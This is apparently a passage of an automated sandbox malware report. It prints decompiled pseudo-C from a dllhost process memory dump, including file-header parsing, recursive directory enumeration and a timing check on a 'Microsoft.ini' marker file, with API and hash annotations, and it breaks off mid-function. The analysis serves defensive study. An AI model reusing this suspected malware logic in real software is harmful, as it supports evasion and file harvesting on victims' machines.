                                                					_t59 = E0286E170(__ecx, _t58, 0); // executed
                                                					_t156 =  !=  ? _t89 :  ==  ? _t89 : 0; // executed
                                                					E0286E320(__ecx,  &_v140, _t59); // executed
                                                					_t157 =  !=  ? _t89 :  !=  ? _t89 :  ==  ? _t89 : 0;
                                                					_t61 = E0286E280(__ecx,  &_v152);
                                                					_v144 = _v152;
                                                					if(_t61 != 0) {
                                                						L4:
                                                						__eflags = _t61;
                                                						_v144 = 0;
                                                						_t157 =  !=  ? _t89 : _t157;
                                                					} else {
                                                						_t61 = E0286E280(__ecx,  &_v152);
                                                						if(_t61 != 0) {
                                                							goto L4;
                                                						} else {
                                                							_t101 = _v152 << 8;
                                                							_v144 = _v144 + _t101;
                                                							_t89 = _t101 | 0xffffffff;
                                                						}
                                                					}
                                                					_t62 = E0286E280(_t146,  &_v152);
                                                					_v148 = _v152;
                                                					if(_t62 != 0) {
                                                						L8:
                                                						__eflags = _t62;
                                                						_v148 = 0;
                                                						_t157 =  !=  ? _t89 : _t157;
                                                					} else {
                                                						_t62 = E0286E280(_t146,  &_v152);
                                                						if(_t62 != 0) {
                                                							goto L8;
                                                						} else {
                                                							_v148 = _v148 + (_v152 << 8);
                                                						}
                                                					}
                                                					_t63 = E0286E280(_t146,  &_v152);
                                                					_v140 = _v152;
                                                					if(_t63 != 0) {
                                                						L12:
                                                						_t90 = 0;
                                                						__eflags = _t63;
                                                						_t157 =  !=  ? 0xffffffff : _t157;
                                                					} else {
                                                						_t63 = E0286E280(_t146,  &_v152);
                                                						if(_t63 != 0) {
                                                							goto L12;
                                                						} else {
                                                							_t90 = (_v152 << 8) + _v140;
                                                						}
                                                					}
                                                					_v128 = _t90;
                                                					_t112 = E0286E280(_t146,  &_v152);
                                                					_v140 = _v152;
                                                					if(_t112 != 0) {
                                                						L16:
                                                						_t67 = 0;
                                                						__eflags = _t112;
                                                						_t158 =  !=  ? 0xffffffff : _t157;
                                                					} else {
                                                						_t112 = E0286E280(_t146,  &_v152);
                                                						if(_t112 != 0) {
                                                							goto L16;
                                                						} else {
                                                							_t67 = (_v152 << 8) + _v140;
                                                						}
                                                					}
                                                					if(_t67 != _t90 || _v148 != 0) {
                                                						L20:
                                                						_t158 = 0xffffff99;
                                                					} else {
                                                						_t184 = _v144;
                                                						if(_v144 != 0) {
                                                							goto L20;
                                                						}
                                                					}
                                                					_t68 = E0286E320(_t146,  &_v100, _t184);
                                                					_t159 =  !=  ? 0xffffffff : _t158;
                                                					E0286E320(_t146,  &_v96, _t68);
                                                					_t160 =  !=  ? 0xffffffff :  !=  ? 0xffffffff : _t158;
                                                					_t70 = E0286E280(_t146,  &_v152);
                                                					_t92 = _v152;
                                                					if(_t70 != 0) {
                                                						L24:
                                                						__eflags = _t70;
                                                						_v124 = 0;
                                                						_t160 =  !=  ? 0xffffffff : _t160;
                                                					} else {
                                                						_t70 = E0286E280(_t146,  &_v152);
                                                						if(_t70 != 0) {
                                                							goto L24;
                                                						} else {
                                                							_v124 = (_v152 << 8) + _t92;
                                                						}
                                                					}
                                                					_t136 =  *((intOrPtr*)(_t146 + 0xc));
                                                					_t118 = _v136 + _t136;
                                                					_t93 = _v100;
                                                					if(_v136 + _t136 < _v96 + _t93 || _t160 != 0) {
                                                						__eflags =  *((char*)(_t146 + 0x10));
                                                						if( *((char*)(_t146 + 0x10)) != 0) {
                                                							CloseHandle( *(_t146 + 4));
                                                						}
                                                						_push(0x20);
                                                						E02870AA1(_t146);
                                                						goto L31;
                                                					} else {
                                                						_t76 = _v136;
                                                						_v132 = _t146;
                                                						_push(0x80);
                                                						_v120 = _t136 - _t93 - _v96 + _t76;
                                                						_v104 = _t76;
                                                						_v8 = _t160;
                                                						 *((intOrPtr*)(_t146 + 0xc)) = _t160;
                                                						_t94 = E02875A3B(_t118);
                                                						memcpy(_t94,  &_v132, 0x20 << 2);
                                                						E0286EC60(_t94);
                                                						return _t94;
                                                					}
                                                				}
                                                			}







































                                                APIs
                                                  • Part of subcall function 0286E170: SetFilePointer.KERNELBASE(?,?,00000002,00000002,?,0286E3D2,00000002,00000001,?,?,?,0286E570,?,00000000,00000001), ref: 0286E190
                                                  • Part of subcall function 0286E280: ReadFile.KERNELBASE(?,?,00000001,00000000,00000000,00000000,00000000,00000001,00000000,00000001,?,?,0286E59A,00000001), ref: 0286E2A8
                                                • CloseHandle.KERNEL32(?), ref: 0286E799
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: File$CloseHandlePointerRead
                                                • String ID:
                                                • API String ID: 3130900363-0
                                                • Opcode ID: 3fbbb45b6869d495bbd26ab7ccfb1ab606f5e3009d34d4735eb5686a2f9ff319
                                                • Instruction ID: 80732293805e388e207109b9dcf6eef1a24b5a36ff114786d4fc493485ed608f
                                                • Opcode Fuzzy Hash: 3fbbb45b6869d495bbd26ab7ccfb1ab606f5e3009d34d4735eb5686a2f9ff319
                                                • Instruction Fuzzy Hash: 61612B7D7043019FD715DE288894A3FB3E2AFC4364F048A2DE969C7281EB70D9098A82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 71%
                                                			E0286AA40(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi) {
                                                				signed int _v12;
                                                				short _v536;
                                                				char _v1056;
                                                				struct _WIN32_FIND_DATAW _v1648;
                                                				signed int _v1649;
                                                				intOrPtr _v1656;
                                                				void* __esi;
                                                				signed int _t32;
                                                				signed int _t36;
                                                				signed int _t37;
                                                				WCHAR* _t38;
                                                				signed int _t43;
                                                				signed int _t44;
                                                				signed int _t46;
                                                				signed int _t50;
                                                				signed int _t51;
                                                				WCHAR* _t55;
                                                				void* _t62;
                                                				intOrPtr* _t64;
                                                				char* _t67;
                                                				char* _t70;
                                                				void* _t74;
                                                				signed int _t75;
                                                				signed int _t76;
                                                				signed int _t77;
                                                				signed int _t78;
                                                				intOrPtr* _t80;
                                                				void* _t81;
                                                				signed int _t82;
                                                				void* _t83;
                                                				void* _t84;
                                                				void* _t85;
                                                				void* _t86;
                                                
                                                				_t32 =  *0x288f008; // 0xe7fe870c
                                                				_v12 = _t32 ^ _t82;
                                                				_v1656 = __edx;
                                                				_t80 = __ecx;
                                                				E02873440(__ecx,  &_v536, 0, 0x208);
                                                				_t64 = _t80;
                                                				_t84 = _t83 + 0xc;
                                                				_t74 = _t64 + 2;
                                                				do {
                                                					_t36 =  *_t64;
                                                					_t64 = _t64 + 2;
                                                				} while (_t36 != 0);
                                                				_t81 = wsprintfW;
                                                				_push(_t80);
                                                				_t37 = _t36 & 0xffffff00 |  *((short*)(_t80 + (_t64 - _t74 >> 1) * 2 - 2)) == 0x0000005c;
                                                				_v1649 = _t37;
                                                				_t38 =  &_v536;
                                                				if(_t37 == 0) {
                                                					_push(L"%ws\\*");
                                                				} else {
                                                					_push(L"%ws*");
                                                				}
                                                				wsprintfW(_t38, ??);
                                                				_t85 = _t84 + 0xc;
                                                				_t62 = FindFirstFileW( &_v536,  &_v1648);
                                                				if(_t62 != 0xffffffff) {
                                                					do {
                                                						_t67 = ".";
                                                						_t43 =  &(_v1648.cFileName);
                                                						while(1) {
                                                							_t75 =  *_t43;
                                                							__eflags = _t75 -  *_t67;
                                                							if(_t75 !=  *_t67) {
                                                								break;
                                                							}
                                                							__eflags = _t75;
                                                							if(_t75 == 0) {
                                                								L12:
                                                								_t44 = 0;
                                                							} else {
                                                								_t78 =  *((intOrPtr*)(_t43 + 2));
                                                								_t17 =  &(_t67[2]); // 0x2e0000
                                                								__eflags = _t78 -  *_t17;
                                                								if(_t78 !=  *_t17) {
                                                									break;
                                                								} else {
                                                									_t43 = _t43 + 4;
                                                									_t67 =  &(_t67[4]);
                                                									__eflags = _t78;
                                                									if(_t78 != 0) {
                                                										continue;
                                                									} else {
                                                										goto L12;
                                                									}
                                                								}
                                                							}
                                                							L14:
                                                							__eflags = _t44;
                                                							if(_t44 != 0) {
                                                								_t70 = L"..";
                                                								_t50 =  &(_v1648.cFileName);
                                                								while(1) {
                                                									_t76 =  *_t50;
                                                									__eflags = _t76 -  *_t70;
                                                									if(_t76 !=  *_t70) {
                                                										break;
                                                									}
                                                									__eflags = _t76;
                                                									if(_t76 == 0) {
                                                										L20:
                                                										_t51 = 0;
                                                									} else {
                                                										_t77 =  *((intOrPtr*)(_t50 + 2));
                                                										_t20 =  &(_t70[2]); // 0x2e
                                                										__eflags = _t77 -  *_t20;
                                                										if(_t77 !=  *_t20) {
                                                											break;
                                                										} else {
                                                											_t50 = _t50 + 4;
                                                											_t70 =  &(_t70[4]);
                                                											__eflags = _t77;
                                                											if(_t77 != 0) {
                                                												continue;
                                                											} else {
                                                												goto L20;
                                                											}
                                                										}
                                                									}
                                                									L22:
                                                									__eflags = _t51;
                                                									if(_t51 != 0) {
                                                										__eflags = _v1648.dwFileAttributes & 0x00000010;
                                                										if((_v1648.dwFileAttributes & 0x00000010) != 0) {
                                                											E02873440(_t80,  &_v1056, 0, 0x208);
                                                											_t86 = _t85 + 0xc;
                                                											__eflags = _v1649;
                                                											_push( &(_v1648.cFileName));
                                                											_push(_t80);
                                                											_t55 =  &_v1056;
                                                											if(__eflags == 0) {
                                                												_push(L"%ws\\%ws");
                                                											} else {
                                                												_push(L"%ws%ws");
                                                											}
                                                											wsprintfW(_t55, ??);
                                                											E0286A970(_t62, _t80, __eflags, _v1656,  &_v1056);
                                                											_t85 = _t86 + 0x18;
                                                										}
                                                									}
                                                									goto L28;
                                                								}
                                                								asm("sbb eax, eax");
                                                								_t51 = _t50 | 0x00000001;
                                                								__eflags = _t51;
                                                								goto L22;
                                                							}
                                                							goto L28;
                                                						}
                                                						asm("sbb eax, eax");
                                                						_t44 = _t43 | 0x00000001;
                                                						__eflags = _t44;
                                                						goto L14;
                                                						L28:
                                                						_t46 = FindNextFileW(_t62,  &_v1648);
                                                						__eflags = _t46;
                                                					} while (_t46 != 0);
                                                					FindClose(_t62);
                                                					__eflags = _v12 ^ _t82;
                                                					return E02870A5D(_v12 ^ _t82, _t81);
                                                				} else {
                                                					return E02870A5D(_v12 ^ _t82, _t81);
                                                				}
                                                			}





































                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: FileFindFirstwsprintf
                                                • String ID: %ws%ws$%ws*$%ws\%ws$%ws\*
                                                • API String ID: 2655791690-2373285283
                                                • Opcode ID: 04f19c473a5fb18544ff9bcc8c51d0c488a3aedda128d2563bc462c7d3890c4d
                                                • Instruction ID: 9c8aeac1137c5809eb13c4f436d8b0d645e2290d83f70035d41d24f9eadb835c
                                                • Opcode Fuzzy Hash: 04f19c473a5fb18544ff9bcc8c51d0c488a3aedda128d2563bc462c7d3890c4d
                                                • Instruction Fuzzy Hash: 38415C7D9002099ADB28EF24DC49FF6737BEF51208F4444E6D90EE7141E7339654CA61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E0286A3B0(void* __ebx, void* __ecx, signed int __edx, void* __edi) {
                                                				signed int _v8;
                                                				short _v532;
                                                				short _v1052;
                                                				struct _FILETIME _v1060;
                                                				struct _FILETIME _v1068;
                                                				struct _FILETIME _v1076;
                                                				struct _FILETIME _v1084;
                                                				struct _FILETIME _v1092;
                                                				struct _FILETIME _v1100;
                                                				void* __esi;
                                                				signed int _t38;
                                                				void* _t50;
                                                				int _t61;
                                                				void* _t69;
                                                				void* _t72;
                                                				signed int _t83;
                                                				signed int _t94;
                                                				void* _t96;
                                                				void* _t97;
                                                				void* _t98;
                                                				void* _t99;
                                                				void* _t100;
                                                				signed int _t103;
                                                
                                                				_t95 = __edi;
                                                				_t94 = __edx;
                                                				_t38 =  *0x288f008; // 0xe7fe870c
                                                				_v8 = _t38 ^ _t103;
                                                				_t99 = __ecx;
                                                				E02873440(__edi,  &_v532, 0, 0x208);
                                                				_t100 = wsprintfW;
                                                				wsprintfW( &_v532, L"%ws\\%ws", _t99, L"Microsoft.ini");
                                                				E02873440(_t95,  &_v1052, 0, 0x208);
                                                				wsprintfW( &_v1052, L"%ws.log",  &_v532);
                                                				_t50 = CreateFileW( &_v532, 0x80000000, 1, 0, 3, 0, 0);
                                                				if(_t50 == 0xffffffff) {
                                                					L14:
                                                					__eflags = _v8 ^ _t103;
                                                					return E02870A5D(_v8 ^ _t103, _t100);
                                                				} else {
                                                					_t101 = CloseHandle;
                                                					CloseHandle(_t50);
                                                					_v1092.dwLowDateTime = 0;
                                                					_v1092.dwHighDateTime = 0;
                                                					_v1100.dwLowDateTime = 0;
                                                					_v1100.dwHighDateTime = 0;
                                                					_v1060.dwLowDateTime = 0;
                                                					_v1060.dwHighDateTime = 0;
                                                					_v1068.dwLowDateTime = 0;
                                                					_v1068.dwHighDateTime = 0;
                                                					_v1076.dwLowDateTime = 0;
                                                					_v1076.dwHighDateTime = 0;
                                                					_v1084.dwLowDateTime = 0;
                                                					_v1084.dwHighDateTime = 0;
                                                					_t96 = CreateFileW( &_v1052, 0x80000000, 1, 0, 2, 0x80, 0);
                                                					if(_t96 == 0xffffffff) {
                                                						L13:
                                                						__eflags = _v8 ^ _t103;
                                                						return E02870A5D(_v8 ^ _t103, _t101);
                                                					} else {
                                                						_t61 = GetFileTime(_t96,  &_v1092,  &_v1060,  &_v1076);
                                                						_push(_t96);
                                                						if(_t61 != 0) {
                                                							CloseHandle();
                                                							DeleteFileW( &_v1052);
                                                							_t97 = CreateFileW( &_v532, 0x80000000, 1, 0, 3, 0x80, 0);
                                                							__eflags = _t97 - 0xffffffff;
                                                							if(_t97 != 0xffffffff) {
                                                								GetFileTime(_t97,  &_v1100,  &_v1068,  &_v1084);
                                                								CloseHandle(_t97);
                                                							}
                                                							asm("sbb eax, [ebp-0x424]");
                                                							_t98 = E02884470(_v1060.dwLowDateTime - _v1068.dwLowDateTime, _v1060.dwHighDateTime, 0x2710, 0);
                                                							_t101 = _v1076.dwLowDateTime - _v1084.dwLowDateTime;
                                                							_t83 = _t94;
                                                							asm("sbb ecx, [ebp-0x434]");
                                                							_t69 = E02884470(_v1076.dwLowDateTime - _v1084.dwLowDateTime, _v1076.dwHighDateTime, 0x2710, 0);
                                                							__eflags = _t83 - _t94;
                                                							if(__eflags < 0) {
                                                								L9:
                                                								_t69 = _t98;
                                                								_t94 = _t83;
                                                							} else {
                                                								if(__eflags <= 0) {
                                                									__eflags = _t98 - _t69;
                                                									if(_t98 <= _t69) {
                                                										goto L9;
                                                									}
                                                								}
                                                							}
                                                							_t72 = E02884470(E02884470(E02884470(_t69, _t94, 0x3e8, 0), _t94, 0x3c, 0), _t94, 0x3c, 0);
                                                							__eflags = _t94;
                                                							if(__eflags < 0) {
                                                								goto L13;
                                                							} else {
                                                								if(__eflags > 0) {
                                                									goto L14;
                                                								} else {
                                                									__eflags = _t72 - 0x48;
                                                									if(_t72 > 0x48) {
                                                										goto L14;
                                                									} else {
                                                										goto L13;
                                                									}
                                                								}
                                                							}
                                                						} else {
                                                							CloseHandle();
                                                							return E02870A5D(_v8 ^ _t103, CloseHandle);
                                                						}
                                                					}
                                                				}
                                                			}



























                                                APIs
                                                • wsprintfW.USER32 ref: 0286A3F6
                                                • wsprintfW.USER32 ref: 0286A421
                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0286A442
                                                • CloseHandle.KERNEL32(00000000), ref: 0286A454
                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000002,00000080,00000000), ref: 0286A4E7
                                                • GetFileTime.KERNEL32(00000000,00000000,00000000,00000000), ref: 0286A50A
                                                • CloseHandle.KERNEL32(00000000), ref: 0286A515
                                                • CloseHandle.KERNEL32(00000000), ref: 0286A52A
                                                • DeleteFileW.KERNEL32(?), ref: 0286A533
                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0286A552
                                                • GetFileTime.KERNEL32(00000000,00000000,00000000,00000000), ref: 0286A571
                                                • CloseHandle.KERNEL32(00000000), ref: 0286A578
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0286A59B
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0286A5C5
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0286A5E1
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0286A5EC
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0286A5F7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: File$Unothrow_t@std@@@__ehfuncinfo$??2@$CloseHandle$Create$Timewsprintf$Delete
                                                • String ID: %ws.log$%ws\%ws$Microsoft.ini
                                                • API String ID: 3158408392-397874326
                                                • Opcode ID: 59cd4b67f92ef2b8029d518b0d61b39abce83cb0e95b2d8c4f712ae795199e07
                                                • Instruction ID: dc51cbf324e6487e084b8496f617a3942fe489cc0c0e40e6abc568a036b17000
                                                • Opcode Fuzzy Hash: 59cd4b67f92ef2b8029d518b0d61b39abce83cb0e95b2d8c4f712ae795199e07
                                                • Instruction Fuzzy Hash: DF51A7B9A4021C6AEB20DA68CC89FEE777DAB44714F5001D9F708F71C1DBB45A848F59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 64%
                                                			E0287221C(signed int* __ecx, signed int __edx, intOrPtr* _a4, intOrPtr _a8, signed int* _a12, intOrPtr _a16, signed int* _a20, char _a24, intOrPtr _a28, signed int _a32) {
                                                				intOrPtr _v0;
                                                				intOrPtr _v4;
                                                				char _v5;
                                                				char _v12;
                                                				char _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				char _v44;
                                                				char _v48;
                                                				signed int _v52;
                                                				signed int _v56;
                                                				intOrPtr _v60;
                                                				char _v72;
                                                				intOrPtr* _v80;
                                                				signed int _v100;
                                                				signed int* _v144;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				char _t190;
                                                				signed int* _t198;
                                                				intOrPtr* _t199;
                                                				signed int _t202;
                                                				signed int _t206;
                                                				intOrPtr* _t210;
                                                				signed int _t211;
                                                				signed int _t212;
                                                				signed int _t214;
                                                				signed int _t215;
                                                				signed int _t217;
                                                				signed int _t221;
                                                				void* _t225;
                                                				signed int _t227;
                                                				void* _t231;
                                                				void* _t233;
                                                				char _t234;
                                                				signed int* _t236;
                                                				signed int _t237;
                                                				signed int _t238;
                                                				signed int _t240;
                                                				signed int _t244;
                                                				void* _t246;
                                                				void* _t248;
                                                				void* _t251;
                                                				intOrPtr _t253;
                                                				intOrPtr _t254;
                                                				void* _t256;
                                                				char _t257;
                                                				signed int _t263;
                                                				char* _t267;
                                                				intOrPtr _t273;
                                                				signed int _t278;
                                                				signed int _t279;
                                                				signed int _t282;
                                                				char _t283;
                                                				intOrPtr _t285;
                                                				signed int _t287;
                                                				signed int* _t289;
                                                				intOrPtr* _t290;
                                                				signed int* _t292;
                                                				signed int _t294;
                                                				intOrPtr _t300;
                                                				intOrPtr* _t304;
                                                				signed int _t305;
                                                				void* _t306;
                                                				signed int* _t310;
                                                				void* _t313;
                                                				void* _t314;
                                                				void* _t316;
                                                				void* _t317;
                                                				void* _t318;
                                                				void* _t319;
                                                
                                                				_t282 = __edx;
                                                				_t264 = __ecx;
                                                				_t253 = _a8;
                                                				_push(_t304);
                                                				_t289 = _a20;
                                                				_v44 = 0;
                                                				_v5 = 0;
                                                				if(_t289[1] > 0x80) {
                                                					_t190 =  *((intOrPtr*)(_t253 + 8));
                                                				} else {
                                                					_t190 =  *((char*)(_t253 + 8));
                                                				}
                                                				_v12 = _t190;
                                                				if(_t190 < 0xffffffff || _t190 >= _t289[1]) {
                                                					L62:
                                                					E0287753C(_t253, _t264, _t289, _t304, __eflags);
                                                					goto L63;
                                                				} else {
                                                					_t304 = _a4;
                                                					if( *_t304 != 0xe06d7363) {
                                                						_t264 = _a12;
                                                						goto L57;
                                                					} else {
                                                						if( *((intOrPtr*)(_t304 + 0x10)) != 3 ||  *((intOrPtr*)(_t304 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930522) {
                                                							L23:
                                                							_t264 = _a12;
                                                							_v16 = _t264;
                                                							goto L25;
                                                						} else {
                                                							_t328 =  *((intOrPtr*)(_t304 + 0x1c));
                                                							if( *((intOrPtr*)(_t304 + 0x1c)) != 0) {
                                                								goto L23;
                                                							} else {
                                                								_t225 = E0287360E(_t253, _t264, _t282, _t289, _t304, _t328);
                                                								_t329 =  *((intOrPtr*)(_t225 + 0x10));
                                                								if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
                                                									L61:
                                                									return _t225;
                                                								} else {
                                                									_t304 =  *((intOrPtr*)(E0287360E(_t253, _t264, _t282, _t289, _t304, _t329) + 0x10));
                                                									_t246 = E0287360E(_t253, _t264, _t282, _t289, _t304, _t329);
                                                									_v44 = 1;
                                                									_v16 =  *((intOrPtr*)(_t246 + 0x14));
                                                									if(_t304 == 0) {
                                                										goto L62;
                                                									} else {
                                                										if( *_t304 != 0xe06d7363 ||  *((intOrPtr*)(_t304 + 0x10)) != 3 ||  *((intOrPtr*)(_t304 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930522) {
                                                											L19:
                                                											_t248 = E0287360E(_t253, _t264, _t282, _t289, _t304, _t336);
                                                											_t337 =  *((intOrPtr*)(_t248 + 0x1c));
                                                											if( *((intOrPtr*)(_t248 + 0x1c)) == 0) {
                                                												L24:
                                                												_t264 = _v16;
                                                												_t190 = _v12;
                                                												L25:
                                                												__eflags =  *_t304 - 0xe06d7363;
                                                												if( *_t304 != 0xe06d7363) {
                                                													L57:
                                                													__eflags = _t289[3];
                                                													if(__eflags <= 0) {
                                                														goto L60;
                                                													} else {
                                                														__eflags = _a24;
                                                														if(__eflags != 0) {
                                                															goto L62;
                                                														} else {
                                                															_push(_a32);
                                                															_push(_a28);
                                                															_push(_t190);
                                                															_push(_t289);
                                                															_push(_a16);
                                                															_push(_t264);
                                                															_push(_t253);
                                                															_push(_t304);
                                                															L66();
                                                															_t316 = _t316 + 0x20;
                                                															goto L60;
                                                														}
                                                													}
                                                												} else {
                                                													__eflags =  *((intOrPtr*)(_t304 + 0x10)) - 3;
                                                													if( *((intOrPtr*)(_t304 + 0x10)) != 3) {
                                                														goto L57;
                                                													} else {
                                                														__eflags =  *((intOrPtr*)(_t304 + 0x14)) - 0x19930520;
                                                														if( *((intOrPtr*)(_t304 + 0x14)) == 0x19930520) {
                                                															L30:
                                                															__eflags = _t289[3];
                                                															if(_t289[3] > 0) {
                                                																_t264 =  &_v28;
                                                																_t233 = E02873879( &_v28, _t289, _a28, _t190,  &_v28,  &_v48);
                                                																_t282 = _v28;
                                                																_t316 = _t316 + 0x14;
                                                																__eflags = _t282 - _v48;
                                                																if(_t282 < _v48) {
                                                																	_t47 = _t233 + 0x10; // 0x10
                                                																	_t278 = _t47;
                                                																	_t234 = _v12;
                                                																	_v36 = _t278;
                                                																	do {
                                                																		_t50 = _t278 - 0x10; // 0x0
                                                																		_v60 = _t50;
                                                																		_t289 = _a20;
                                                																		__eflags =  *((intOrPtr*)(_t278 - 0x10)) - _t234;
                                                																		if( *((intOrPtr*)(_t278 - 0x10)) <= _t234) {
                                                																			__eflags = _t234 -  *((intOrPtr*)(_t278 - 0xc));
                                                																			if(_t234 <=  *((intOrPtr*)(_t278 - 0xc))) {
                                                																				_v24 =  *_t278;
                                                																				_t263 =  *(_t278 - 4);
                                                																				__eflags = _t263;
                                                																				_v32 = _t263;
                                                																				_t253 = _a8;
                                                																				if(_t263 > 0) {
                                                																					_t279 = _v24;
                                                																					_t236 =  *( *((intOrPtr*)(_t304 + 0x1c)) + 0xc);
                                                																					_t287 =  *_t236;
                                                																					_t237 =  &(_t236[1]);
                                                																					__eflags = _t237;
                                                																					_v52 = _t237;
                                                																					_t238 = _v32;
                                                																					_v56 = _t287;
                                                																					while(1) {
                                                																						_v20 = _v52;
                                                																						_t289 = _a20;
                                                																						_v40 = _t287;
                                                																						__eflags = _t287;
                                                																						if(_t287 <= 0) {
                                                																							goto L41;
                                                																						} else {
                                                																							goto L38;
                                                																						}
                                                																						while(1) {
                                                																							L38:
                                                																							_t240 = E02872B69(_t279,  *_v20,  *((intOrPtr*)(_t304 + 0x1c)));
                                                																							_t316 = _t316 + 0xc;
                                                																							__eflags = _t240;
                                                																							if(_t240 != 0) {
                                                																								break;
                                                																							}
                                                																							_v20 = _v20 + 4;
                                                																							_t244 = _v40 - 1;
                                                																							_t279 = _v24;
                                                																							_v40 = _t244;
                                                																							__eflags = _t244;
                                                																							if(_t244 > 0) {
                                                																								continue;
                                                																							} else {
                                                																								_t238 = _v32;
                                                																								goto L41;
                                                																							}
                                                																							L44:
                                                																							_t282 = _v28;
                                                																							_t278 = _v36;
                                                																							_t234 = _v12;
                                                																							goto L45;
                                                																						}
                                                																						_push(_v44);
                                                																						_v5 = 1;
                                                																						E02872157(_t253, _t287, _t304, _t253, _v16, _a16, _t289, _v24,  *_v20, _v60, _a28, _a32);
                                                																						_t316 = _t316 + 0x2c;
                                                																						goto L44;
                                                																						L41:
                                                																						_t238 = _t238 - 1;
                                                																						_t279 = _t279 + 0x10;
                                                																						_v32 = _t238;
                                                																						_v24 = _t279;
                                                																						__eflags = _t238;
                                                																						if(_t238 > 0) {
                                                																							_t287 = _v56;
                                                																							_v20 = _v52;
                                                																							_t289 = _a20;
                                                																							_v40 = _t287;
                                                																							__eflags = _t287;
                                                																							if(_t287 <= 0) {
                                                																								goto L41;
                                                																							} else {
                                                																								goto L38;
                                                																							}
                                                																						}
                                                																						goto L44;
                                                																					}
                                                																				}
                                                																			}
                                                																		}
                                                																		L45:
                                                																		_t282 = _t282 + 1;
                                                																		_t278 = _t278 + 0x14;
                                                																		_v28 = _t282;
                                                																		_v36 = _t278;
                                                																		__eflags = _t282 - _v48;
                                                																	} while (_t282 < _v48);
                                                																}
                                                															}
                                                															__eflags = _a24;
                                                															if(__eflags != 0) {
                                                																_push(1);
                                                																E02871E94(__eflags);
                                                																_t264 = _t304;
                                                															}
                                                															__eflags = _v5;
                                                															if(__eflags != 0) {
                                                																L60:
                                                																_t225 = E0287360E(_t253, _t264, _t282, _t289, _t304, __eflags);
                                                																__eflags =  *(_t225 + 0x1c);
                                                																if(__eflags != 0) {
                                                																	goto L62;
                                                																} else {
                                                																	goto L61;
                                                																}
                                                															} else {
                                                																_t227 =  *_t289 & 0x1fffffff;
                                                																__eflags = _t227 - 0x19930521;
                                                																if(__eflags < 0) {
                                                																	goto L60;
                                                																} else {
                                                																	__eflags = _t289[7];
                                                																	if(_t289[7] != 0) {
                                                																		L52:
                                                																		__eflags = _t289[8] & 0x00000004;
                                                																		if(__eflags != 0) {
                                                																			goto L62;
                                                																		} else {
                                                																			_push(_t289[7]);
                                                																			L86();
                                                																			_t264 = _t304;
                                                																			__eflags = _t227;
                                                																			if(__eflags != 0) {
                                                																				goto L60;
                                                																			} else {
                                                																				E0287360E(_t253, _t264, _t282, _t289, _t304, __eflags);
                                                																				E0287360E(_t253, _t264, _t282, _t289, _t304, __eflags);
                                                																				 *((intOrPtr*)(E0287360E(_t253, _t264, _t282, _t289, _t304, __eflags) + 0x10)) = _t304;
                                                																				_t231 = E0287360E(_t253, _t264, _t282, _t289, _t304, __eflags);
                                                																				__eflags = _a32;
                                                																				_t267 = _v16;
                                                																				_push(_t304);
                                                																				 *((intOrPtr*)(_t231 + 0x14)) = _t267;
                                                																				if(_a32 != 0) {
                                                																					goto L64;
                                                																				} else {
                                                																					_push(_t253);
                                                																				}
                                                																				goto L65;
                                                																			}
                                                																		}
                                                																	} else {
                                                																		__eflags = _t289[8] & 0x00000004;
                                                																		if(__eflags == 0) {
                                                																			goto L60;
                                                																		} else {
                                                																			goto L52;
                                                																		}
                                                																	}
                                                																}
                                                															}
                                                														} else {
                                                															__eflags =  *((intOrPtr*)(_t304 + 0x14)) - 0x19930521;
                                                															if( *((intOrPtr*)(_t304 + 0x14)) == 0x19930521) {
                                                																goto L30;
                                                															} else {
                                                																__eflags =  *((intOrPtr*)(_t304 + 0x14)) - 0x19930522;
                                                																if( *((intOrPtr*)(_t304 + 0x14)) != 0x19930522) {
                                                																	goto L57;
                                                																} else {
                                                																	goto L30;
                                                																}
                                                															}
                                                														}
                                                													}
                                                												}
                                                											} else {
                                                												_v36 =  *((intOrPtr*)(E0287360E(_t253, _t264, _t282, _t289, _t304, _t337) + 0x1c));
                                                												_t251 = E0287360E(_t253, _t264, _t282, _t289, _t304, _t337);
                                                												_push(_v36);
                                                												_push(_t304);
